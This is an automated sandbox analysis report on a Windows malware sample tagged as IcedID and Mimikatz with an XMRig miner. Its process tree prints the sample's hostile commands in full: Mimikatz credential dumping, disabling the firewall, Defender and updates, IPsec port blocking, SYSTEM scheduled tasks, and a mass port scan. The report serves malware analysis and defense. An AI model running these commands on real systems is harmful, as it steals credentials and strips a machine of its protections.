Analysis
-
max time kernel
150s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20240412-en -
resource tags
-
submitted
23-04-2024 00:50
General
-
Target
2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe
-
Size
8.5MB
-
MD5
528357739aa4f0b9a2af7ad036639828
-
SHA1
854fd936c1fba4aa9e36324b1a8c10503a497dc9
-
SHA256
32dc01238f295ae4722a2c1e4db252d661e8bc95349deacd445ac79798b85209
-
SHA512
7e7ea4415b6e8cc3f0913e224806f288bae95bb24e5a8ef5b4390af3081dde690370cd7a74f3db9742858ef489340c0aa9bb24bc8dc074dd39b09171511bc451
-
SSDEEP
196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1
Malware Config
Signatures
-
Mimikatz
mimikatz is an open source tool to dump credentials on Windows.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Contacts a large (30499) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
-
Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
-
UPX dump on OEP (original entry point) 39 IoCs
-
XMRig Miner payload 11 IoCs
-
mimikatz is an open source tool to dump credentials on Windows 4 IoCs
-
Drops file in Drivers directory 3 IoCs
-
Modifies Windows Firewall 2 TTPs 2 IoCs
-
Sets file execution options in registry 2 TTPs 40 IoCs
-
Executes dropped EXE 29 IoCs
-
Loads dropped DLL 12 IoCs
-
UPX packed file 37 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Looks up external IP address via web service 2 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Creates a Windows Service
-
Drops file in System32 directory 18 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 60 IoCs
-
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
NSIS installer 3 IoCs
-
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Modifies data under HKEY_USERS 45 IoCs
-
Modifies registry class 14 IoCs
-
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 15 IoCs
-
Suspicious behavior: RenamesItself 1 IoCs
-
Suspicious use of AdjustPrivilegeToken 24 IoCs
-
Suspicious use of SetWindowsHookEx 12 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵
-
C:\Windows\TEMP\bvzeemvvy\gzbahn.exe"C:\Windows\TEMP\bvzeemvvy\gzbahn.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2024-04-23_528357739aa4f0b9a2af7ad036639828_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\tbzbbivf\simzbkl.exe2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- Runs ping.exe
-
C:\Windows\tbzbbivf\simzbkl.exeC:\Windows\tbzbbivf\simzbkl.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
-
C:\Windows\tbzbbivf\simzbkl.exeC:\Windows\tbzbbivf\simzbkl.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Sets file execution options in registry
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exeC:\Windows\gtuqsjqjh\bnafefjyn\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtuqsjqjh\bnafefjyn\Scant.txt2⤵
-
C:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exeC:\Windows\gtuqsjqjh\bnafefjyn\eebtnglvf.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\gtuqsjqjh\bnafefjyn\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\gtuqsjqjh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\gtuqsjqjh\Corporate\log.txt2⤵
- Drops file in Windows directory
-
C:\Windows\gtuqsjqjh\Corporate\vfshost.exeC:\Windows\gtuqsjqjh\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ybzbbbevz" /ru system /tr "cmd /c C:\Windows\ime\simzbkl.exe"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ybzbbbevz" /ru system /tr "cmd /c C:\Windows\ime\simzbkl.exe"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "binhbqlnw" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "binhbqlnw" /ru system /tr "cmd /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "mfnqlsiht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F"2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "mfnqlsiht" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F"3⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static set policy name=Bastards assign=y2⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net stop SharedAccess2⤵
-
C:\Windows\SysWOW64\net.exenet stop SharedAccess3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop SharedAccess4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c netsh firewall set opmode mode=disable2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh firewall set opmode mode=disable3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.execmd /c netsh Advfirewall set allprofiles state off2⤵
-
C:\Windows\SysWOW64\netsh.exenetsh Advfirewall set allprofiles state off3⤵
- Modifies Windows Firewall
-
C:\Windows\SysWOW64\cmd.execmd /c net stop MpsSvc2⤵
-
C:\Windows\SysWOW64\net.exenet stop MpsSvc3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop MpsSvc4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net stop WinDefend2⤵
-
C:\Windows\SysWOW64\net.exenet stop WinDefend3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop WinDefend4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c net stop wuauserv2⤵
-
C:\Windows\SysWOW64\net.exenet stop wuauserv3⤵
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop wuauserv4⤵
-
C:\Windows\SysWOW64\cmd.execmd /c sc config MpsSvc start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config MpsSvc start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc config SharedAccess start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config SharedAccess start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc config WinDefend start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config WinDefend start= disabled3⤵
- Launches sc.exe
-
C:\Windows\SysWOW64\cmd.execmd /c sc config wuauserv start= disabled2⤵
-
C:\Windows\SysWOW64\sc.exesc config wuauserv start= disabled3⤵
- Launches sc.exe
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 780 C:\Windows\TEMP\gtuqsjqjh\780.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\xohudmc.exeC:\Windows\TEMP\xohudmc.exe2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious use of SetWindowsHookEx
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 384 C:\Windows\TEMP\gtuqsjqjh\384.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2096 C:\Windows\TEMP\gtuqsjqjh\2096.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2744 C:\Windows\TEMP\gtuqsjqjh\2744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2756 C:\Windows\TEMP\gtuqsjqjh\2756.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3068 C:\Windows\TEMP\gtuqsjqjh\3068.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2536 C:\Windows\TEMP\gtuqsjqjh\2536.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3892 C:\Windows\TEMP\gtuqsjqjh\3892.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3108 C:\Windows\TEMP\gtuqsjqjh\3108.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2708 C:\Windows\TEMP\gtuqsjqjh\2708.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 3952 C:\Windows\TEMP\gtuqsjqjh\3952.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4476 C:\Windows\TEMP\gtuqsjqjh\4476.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 2208 C:\Windows\TEMP\gtuqsjqjh\2208.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4932 C:\Windows\TEMP\gtuqsjqjh\4932.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 1560 C:\Windows\TEMP\gtuqsjqjh\1560.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 1924 C:\Windows\TEMP\gtuqsjqjh\1924.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 880 C:\Windows\TEMP\gtuqsjqjh\880.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exeC:\Windows\TEMP\gtuqsjqjh\vmebnmlbn.exe -accepteula -mp 4744 C:\Windows\TEMP\gtuqsjqjh\4744.dmp2⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.execmd.exe /c C:\Windows\gtuqsjqjh\bnafefjyn\scan.bat2⤵
-
C:\Windows\gtuqsjqjh\bnafefjyn\bvbvfuizb.exebvbvfuizb.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save3⤵
- Executes dropped EXE
- Drops file in Windows directory
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
-
C:\Windows\SysWOW64\nslfoo.exeC:\Windows\SysWOW64\nslfoo.exe1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\simzbkl.exe1⤵
-
C:\Windows\ime\simzbkl.exeC:\Windows\ime\simzbkl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\TEMP\bvzeemvvy\gzbahn.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F1⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"2⤵
-
C:\Windows\system32\cacls.execacls C:\Windows\tbzbbivf\simzbkl.exe /p everyone:F2⤵
-
C:\Windows\system32\cmd.EXEC:\Windows\system32\cmd.EXE /c C:\Windows\ime\simzbkl.exe1⤵
-
C:\Windows\ime\simzbkl.exeC:\Windows\ime\simzbkl.exe2⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
Network
MITRE ATT&CK Matrix ATT&CK v13
Persistence
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Privilege Escalation
Create or Modify System Process
1Windows Service
1Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Scheduled Task/Job
1Defense Evasion
Impair Defenses
1Disable or Modify System Firewall
1Modify Registry
1Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Windows\SysWOW64\Packet.dllFilesize
95KB
MD586316be34481c1ed5b792169312673fd
SHA16ccde3a8c76879e49b34e4abb3b8dfaf7a9d77b5
SHA25649656c178b17198470ad6906e9ee0865f16f01c1dbbf11c613b55a07246a7918
SHA5123a6e77c39942b89f3f149e9527ab8a9eb39f55ac18a9db3a3922dfb294beb0760d10ca12be0e3a3854ff7dabbe2df18c52e3696874623a2a9c5dc74b29a860bc
-
C:\Windows\SysWOW64\wpcap.dllFilesize
275KB
MD54633b298d57014627831ccac89a2c50b
SHA1e5f449766722c5c25fa02b065d22a854b6a32a5b
SHA256b967e4dce952f9232592e4c1753516081438702a53424005642700522055dbc9
SHA51229590fa5f72e6a36f2b72fc2a2cca35ee41554e13c9995198e740608975621142395d4b2e057db4314edf95520fd32aae8db066444d8d8db0fd06c391111c6d3
-
C:\Windows\TEMP\bvzeemvvy\config.jsonFilesize
693B
MD5f2d396833af4aea7b9afde89593ca56e
SHA108d8f699040d3ca94e9d46fc400e3feb4a18b96b
SHA256d6ae7c6275b7a9b81ae4a4662c9704f7a68d5943fcc4b8d035e53db708659b34
SHA5122f359d080c113d58a67f08cb44d9ab84b0dfd7392d6ddb56ca5d1b0e8aa37b984fac720e4373d4f23db967a3465fcf93cee66d7934d4211a22e1ebc640755f01
-
C:\Windows\TEMP\gtuqsjqjh\2096.dmpFilesize
4.2MB
MD543e6520151450ad926debf9525ee2610
SHA1c55f2ae511f1499c11a5158964845a216fb5b30b
SHA256d2db1f82e9c29b9f27806f14b2d7d17f9c78db008c543750f4413980389c9582
SHA51290c31ed5d2c3a7b8194d52fea178be2ae1477449ebfc17ecc557e8929eb644e699932eccbc37f0befa41dac5f8405a07d7f45cd2eda7430e1c6b0630f9158451
-
C:\Windows\TEMP\gtuqsjqjh\2208.dmpFilesize
25.9MB
MD5fb0c81e05b80d8740eb358f52765f2f6
SHA153a1637d9e0e0101438b7026325f611c3365f852
SHA2563b18b19a84379fd864c22c91f8795ad10341f0e4f34be0e754b696670e1f9002
SHA512432e82c3bd39f880c1be1d70af7b5a004594dbfd795a8782c7f5ee2a96d2b001a85f26736f3bf94e40d1097c0bcd70f0b3bb17c74b0fcf35c0df2f344e4490ec
-
C:\Windows\TEMP\gtuqsjqjh\2536.dmpFilesize
814KB
MD5f8888812959d764f12b5741de7f5c166
SHA11fab4d28c0574119e7a0c1acc6c93213aab15b07
SHA256584444b2c6c6d5e75ba3e669eb9fc15c264d631bdc6356eadbd9e7eb6b1eb760
SHA5123eeacbd89741527e91934ae09d41a2806f05a1694b9bdae23e9a36fd6969ba7d2ad27d59dba740818a7e91ad971c410638adb6ec1e8340ee5e5daa257c9a73a8
-
C:\Windows\TEMP\gtuqsjqjh\2708.dmpFilesize
6.8MB
MD5443ea203268413794715083ed05fde51
SHA117c96e10bb1e1f518686c78501f0cb709fe6bb71
SHA2560adf470c6c4d1165b26895cb49047793034913c4a54eef895d3e0b6a47e3dc47
SHA5128a13d0f52b6b65c3f6c1522549fe9e36662f6c610799b09c24d87ac19aa7b987d8c3738cd57479bce3eaf3ab1696d61afc479b9c4c25cb7fc3e4763851bc9a48
-
C:\Windows\TEMP\gtuqsjqjh\2744.dmpFilesize
7.5MB
MD584469c658f5a79ab7106d4592b5957c2
SHA14fb4c4fa780e9d9489c3063623a6d01d12c6d2a3
SHA256791985170983305a6c6f63152f9f61afa516ff7bead77634b635b770334491a4
SHA512b32fe4b1de95f54ad865ef3c9dc04468d6a927d9310cc3cb1e1c530a207d3151ae57dffd8cdf145258701c7c4098e86cba0ec88592952e4fed2c6dcfa442e522
-
C:\Windows\TEMP\gtuqsjqjh\2756.dmpFilesize
3.9MB
MD59ad25f749a13d7d99836eea6b99cb46a
SHA1df2775e9eafef9e4edffad28f269488a37820feb
SHA2564d88102f1c76b52b69154abf9d871bc180db35ac1e08bf86543a66232c8e6bd6
SHA5123c156527c581a5632aaec70e4d19824f1db0f8f8c2d56c665c93239a0b2d064df946e552af9c2a64d1772d7df482316f87300aed56d7876026dd85e8d045ad68
-
C:\Windows\TEMP\gtuqsjqjh\3068.dmpFilesize
3.0MB
MD5ecc9e4c78936d3071e8d5c82bbc2cc2f
SHA1790fcff83d87357cabd840655a5ef340b34e22fe
SHA2565dc4580ab32bb8518cc472c3ae813f42d4c8fe9fefe8f2937542e5a3b66f5975
SHA5123eb0c056cc65ffaaa1353f5ef5a3bc461efc475b74a68fd0e0d3c9a7e48b32a3db8b76572d3d8d9733860018ad6db3181e88fec25a898dcc1d58335b53d0cc18
-
C:\Windows\TEMP\gtuqsjqjh\3108.dmpFilesize
20.6MB
MD548ff6d9bc9c8b5597b46e6ea0679fe99
SHA1c7be8beb9b3566f1af519f4a608adea22b45e8e3
SHA256a5bc37493a7112d74c5389cc93c46f702c8dec9b87a57cb6966c5c42aeb483b5
SHA5125f062b1b973985fa069f63736af3a59367d1f02fc6d198bffd62c9224deeab99277f640dc2088df6dfbd884f90d6fc716403d5edc6fa233a550409684fe7d7a9
-
C:\Windows\TEMP\gtuqsjqjh\384.dmpFilesize
33.7MB
MD592333e7ce309dc5372866442ebd1ddfb
SHA1ad902eb9ca1264d37fbd24556da55e4bff78ab94
SHA256dd9ada2687f27a179ad8ec2e89550ee2ab7f8cd0b7aa6d437937947e3127e439
SHA5124b197840e7ce153ddf7786109cadf5f7fab2b97c091633a8de44a384bdf6b2c404929d8d151d32dc52485e314adaaf527655b0ddadcaabb610ced6bf06363913
-
C:\Windows\TEMP\gtuqsjqjh\3892.dmpFilesize
2.5MB
MD5226ec9ed293b2f378fc0ad439a60654c
SHA1b30bd5c4200485b528462a19d260a429f79b9033
SHA256cdd8906928012241270fa8898b8424f31e1f7485e6df715b8c6b3767926190f8
SHA5124099d150648cfae5c97965df04a85839d01644a3e59f4c06ddbeb60a583e2178722a633b28ec7043b0f82f8e5faa0e883bdf6f75840ad246d24de24b0026eee3
-
C:\Windows\TEMP\gtuqsjqjh\3952.dmpFilesize
45.4MB
MD5f56e8cff3c79777bc0b20945a42d5ce9
